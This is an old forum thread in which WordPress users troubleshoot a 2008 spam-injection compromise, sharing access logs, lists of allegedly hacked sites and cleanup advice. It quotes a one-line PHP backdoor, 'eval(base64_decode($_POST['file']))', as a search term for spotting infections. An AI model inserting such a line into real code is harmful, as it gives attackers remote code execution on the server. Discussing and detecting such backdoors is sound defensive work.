Hacking Problem

I keep getting this:

protected.com/logs/access.log:194.110.162.23 – – [24/Mar/2008:01:46:27 -0400] “POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1” 200 25 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3”
protected.com/logs/access.log:194.110.162.23 – – [24/Mar/2008:01:46:28 -0400] “POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1” 200 25 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:38:22 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “https://www.protected.com/page/3” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:38:22 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “https://www.protected.com/page/3” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:52:18 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “https://www.protected.com/page/images/protected.jpg” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:52:18 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “https://www.protected.com/page/images/protected.jpg” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:78.151.173.179 – – [24/Mar/2008:05:51:43 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “https://www.protected.com/” “Dummy/1.00 (Windows NT 5.1; U; en-us)”
protected.com/logs/access.log:78.151.173.179 – – [24/Mar/2008:05:51:46 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “https://www.protected.com/” “Dummy/1.00 (Windows NT 5.1; U; en-us)”
protected.com/logs/access.log:77.91.224.14 – – [24/Mar/2008:06:00:23 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “-” “WebAlta Crawler/2.0 (https://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)”
protected.com/logs/access.log:77.91.224.14 – – [24/Mar/2008:06:03:01 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “-” “WebAlta Crawler/2.0 (https://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)”

Once that appears in my logs I have several files with code injected and all of my files are touched to the same date.

https://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/

Good explanation…

Google for:

eval(base64_decode($_POST[‘file’])); exit;

Apparently XMLRPC is hackable!

VRocKs: There are no known exploits for WordPress 2.3.3. Are you running the latest version? Are you *SURE*?

Furthermore, the log you posted is showing somebody running an exploit, not somebody installing one. That exploit could have been added to your site through any of half a dozen other ways.

We need more information to confirm that this is a WordPress issue. Nothing you have given us confirms that or shows any sort of a clue on how you were hacked.

In other words, telling us WordPress has a problem is useless to us unless you can also tell us where the problem is.

there is also no indication this is primarily w WP problem, and not something underlying.

https://www.kidscoop.org/ is exploited and it’s inside their gallery installation.

https://www.larmac.com.au/ also popped up.

https://www.lentini.co.uk is hacked. Ive emailed him; notice the old version?

https://www.jtechnica.com is hacked, with the hqc.php bits, even. And its not a wordpress install.

https://www.uneditedspirituality.ca/ is hacked with the hcq.php, and that’s Joomla.

https://www.spinlabs.ca/ is hacked and its an older version. Not real old, but still. And somehow, in a case of “hahah, you reap what you sow”, this person has *apparantly* actively disabled the upgrade notices:

https://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/

https://jeremyduncan.ca/ is hacked, and the redirect to the spam content is able to be called right off his index.php page.

https://www.hansdreesen.com/ = hacked.

https://www.thinkerlabs.ca/jonmanafo is hacked. another old version; i emailed him.. no reply.

Those are just a few of the sites that popped up in the $_POST logging i have set up on one site that I am watching. Oddly enough, even over the course of a few days, the IP never changed: 216.246.56.146

I setup a honeypot for them…

I also put on an aluminum foil hat…

I will let you know…

it does appear like a wordpress problem. I have been having this lately–for the past few weeks. Look here:

https://mraziz.com/personal/2008/03/16/post-spam/

this same post mentioned above is injected with spam, no matter how many times i edit the post and remove it it gets back, and comments are turned off too. I thought it was a problem with my host and I was hacked so I changed my host to a new one, same problem is happneing. I’m using 2.3.3 and I’m sure about it.

Do you have any logs of how they’re doing it.

which logs do you need? or which file?

I can tell you how theyre doing it. we saw it in the $_POST logging. Donncha was made aware of it as well.

Theyre calling a file behind wp-admin/ It cannot be replicated unless you are logged in as an admin. Not logged in, then you are properly redirected to login. And a simple subscriber acct, if you are logged in as such, is told they dont have the necessary permissions.

The consensus was either it was a cookie or a password thing.

I am NOT sharing the file name, it serves no purpose for me to do so.

Well, how are they logging in then? I mean, I could login to your blog as you if I could get ahold of your cookies, but I don’t quite see how they’re getting those.

that was Donncha’s reaction, exactly, otto. Ive seen an attempted sql exploit that attempts to get the admin password but it fails on a wordpress 2.3.3 install, and as far as I could see, its old.

There are 2 things going on.

1. the wp-content/1 thing .. that attack is actually visible in your Apache logs. They use a core file behind wp-admin/ to create a rootshell on a file that already exists (that ought to give it away for you, otto)

2. The insertions into actual posts. Thats yet another file behind wp-admin/

Both of these require you to be logged in, the _noonce fails without a valid admin login.

I have examples of both of those, if youre interested Otto. Just drop me an email.

So what shall I do to resolve this?

start by changing your admin password. If you changed it once, change it again. And I dont care what anyone says to the contrary, I would change the names of your cookies. Someone I helped mentioned seeing session variables inside on of their wordpress tables, I havent seen that anywhere though. If you see any, I would clear em.

If you want to be a guinea pig and try to help figuring out the problem, send me an email and we can set up some logging. Its takes 2 minutes.

Anyway, if you as you say they are logging in as admin, why is it only happening to the most recent post only? If i were a spammer and I obtained admin access I would spam/alter all the posts and even mass post spam everywhere.

Anyway, if you as you say they are logging …

anyway?

I could answer your question by showing you the $_POST variables, I’m not going to.

I’ll assume by your lack of reply to my offer that you arent interested in actually seeing all of this for yourself, which btw, would have negated the necessity for such a question. Therefore, I wish you the best, and you may consider my offer rescinded.